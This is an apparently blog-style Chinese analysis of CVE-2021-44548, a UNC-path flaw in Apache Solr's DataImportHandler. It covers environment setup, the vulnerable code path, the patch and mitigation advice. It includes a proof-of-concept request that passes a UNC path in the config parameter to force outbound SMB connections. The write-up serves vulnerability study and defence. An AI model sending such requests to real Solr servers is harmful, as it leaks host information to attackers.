CVE-2021-44548 Apache Solr UNC路径信息泄露漏洞分析<\/h1>

漏洞概述<\/h2>
CVE-2021-44548是Apache Solr DataImportHandler组件中的一个输入验证漏洞，允许攻击者提供Windows UNC路径，导致Solr主机向网络上的另一台主机发起SMB网络请求，可能造成信息泄露。<\/p>
影响版本<\/strong>：Apache Solr < 8.11.1（仅影响Windows系统）<\/p>

漏洞原理<\/h2>
漏洞存在于DataImportHandler的配置加载功能中，当处理show-config<\/code>命令时，如果传入的config<\/code>参数以\\<\/code>开头（Windows UNC路径格式），Solr会尝试访问该UNC路径，从而向指定主机发起SMB请求。<\/p>
环境搭建<\/h2> 启动Solr（带调试参数）：<\/p> .\/solr.cmd start -p 8983 -f -a "-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8988" <\/code><\/pre> <\/li> 创建SolrCore：<\/p> .\/solr.cmd create_core -c core1 <\/code><\/pre> <\/li> 下载必要组件：<\/p> mysql-connector-java-5.1.42-bin.jar<\/li> solr-dataimporthandler-7.3.1.jar<\/li> solr-dataimporthandler-extras-7.3.1.jar<\/li> <\/ul> <\/li> 修改solrconfig.xml<\/code>添加DataImportHandler配置：<\/p> <requestHandler<\/span> name=<\/span>"\/dataimport"<\/span> class=<\/span>"org.apache.solr.handler.dataimport.DataImportHandler"<\/span>><\/span> <\/span><\/span> <lst<\/span> name=<\/span>"defaults"<\/span>><\/span> <\/span><\/span> <str<\/span> name=<\/span>"config"<\/span>><\/span>data-config.xml<\/str><\/span> <\/span><\/span> <\/lst><\/span> <\/span><\/span><\/requestHandler><\/span> <\/span><\/span> <\/span><\/span><lib<\/span> dir=<\/span>"D:\临时\Apache_Solr\solr-8.11.0\dist\/"<\/span> regex=<\/span>"mysql-connector-java-5.1.42-bin.jar"<\/span> \/><\/span> <\/span><\/span><lib<\/span> dir=<\/span>"D:\临时\Apache_Solr\solr-8.11.0\contrib\/dataimporthandler\/lib"<\/span> regex=<\/span>".*\.jar"<\/span> \/><\/span> <\/span><\/span><lib<\/span> dir=<\/span>"D:\临时\Apache_Solr\solr-8.11.0\contrib\/dataimporthandler-extras\/lib"<\/span> regex=<\/span>".*\.jar"<\/span> \/><\/span> <\/span><\/span><lib<\/span> dir=<\/span>"D:\临时\Apache_Solr\solr-8.11.0\dist\/"<\/span> regex=<\/span>"solr-dataimporthandler.*\.jar"<\/span> \/><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 漏洞分析<\/h2> 触发点<\/h3> 请求路由：<\/p> http:\/\/localhost:8983\/solr\/core1\/dataimport?_=1640242938294&command=reload-config&indent=on&wt=json <\/code><\/pre> <\/li> 处理逻辑位于DataImportHandler#handleRequestBody<\/code><\/p> <\/li> 当传入command=show-config<\/code>且config<\/code>参数不为空时，会调用openResource<\/code>操作<\/p> <\/li> <\/ol> 关键代码路径<\/h3> SolrResourceLoader.openResource<\/code>方法：<\/p> this.getInstancePath()<\/code>获取路径（如D:\Apache_Solr\solr-8.11.0\server\solr\core1<\/code>）<\/li> 执行resolve("conf")<\/code>变为D:\Apache_Solr\solr-8.11.0\server\solr\core1\conf<\/code><\/li> 执行resolve(resource)<\/code>时，如果resource<\/code>以\\<\/code>开头，WindowsPathType<\/code>变为UNC<\/li> <\/ul> <\/li> resolve<\/code>逻辑：<\/p> 判断WindowsPathType<\/code>是否为绝对路径或UNC路径<\/li> 如果是则直接返回参数<\/li> 导致Files.exists<\/code>会尝试访问UNC路径<\/li> <\/ul> <\/li> <\/ol> 漏洞利用<\/h3> 构造如下请求触发漏洞：<\/p> http:\/\/localhost:8983\/solr\/core1\/dataimport?command=show-config&config=\\xxx\xxx <\/code><\/pre> 限制与防御<\/h2> 限制：<\/p> 只能读取SolrCore目录下的文件<\/li> 需要开启-Dsolr.allow.unsafe.resourceloading=true<\/code>才能扩大影响<\/li> <\/ul> <\/li> 补丁修复：<\/p> 添加了对resource<\/code>参数是否以\\<\/code>开头的检查<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 该漏洞虽然危害有限（仅能触发SMB请求和有限的文件读取），但揭示了Solr在处理路径时的安全问题。开发者应当：<\/p> 对所有用户输入的路径参数进行严格验证<\/li> 避免直接使用用户输入构造文件路径<\/li> 及时更新到安全版本（8.11.1及以上）<\/li> <\/ol>